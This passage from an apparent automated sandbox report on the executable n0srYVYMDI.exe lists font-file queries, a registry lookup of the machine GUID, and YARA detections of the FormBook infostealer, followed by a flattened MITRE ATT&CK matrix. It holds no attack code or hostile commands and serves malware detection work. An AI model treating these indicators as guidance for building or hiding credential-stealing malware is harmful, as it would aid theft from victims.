          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00246854 GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,4_2_00246854
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00244D08 GetVersion,4_2_00244D08
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.n0srYVYMDI.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.n0srYVYMDI.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.4169039810.0000000003380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.4169280068.0000000003780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1726895597.0000000004361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.n0srYVYMDI.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.n0srYVYMDI.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.4169039810.0000000003380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.4169280068.0000000003780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1726895597.0000000004361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire Infrastructure1
          Valid Accounts          		1
          Shared Modules          		1
          Valid Accounts          		1
          Valid Accounts          		1
          Masquerading          		OS Credential Dumping1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		1
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/Job1
          DLL Side-Loading          		1
          Access Token Manipulation          		1
          Valid Accounts          		LSASS Memory241
          Security Software Discovery          		Remote Desktop ProtocolData from Removable Media2
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)512
          Process Injection          		1
          Access Token Manipulation          		Security Account Manager2
          Process Discovery          		SMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
          Abuse Elevation Control Mechanism          		1
          Disable or Modify Tools          		NTDS41
          Virtualization/Sandbox Evasion          		Distributed Component Object ModelInput Capture12
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
          DLL Side-Loading          		41
          Virtualization/Sandbox Evasion          		LSA Secrets1
          Application Window Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts512
          Process Injection          		Cached Domain Credentials1
          File and Directory Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          Deobfuscate/Decode Files or Information          		DCSync225
          System Information Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          Abuse Elevation Control Mechanism          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt4
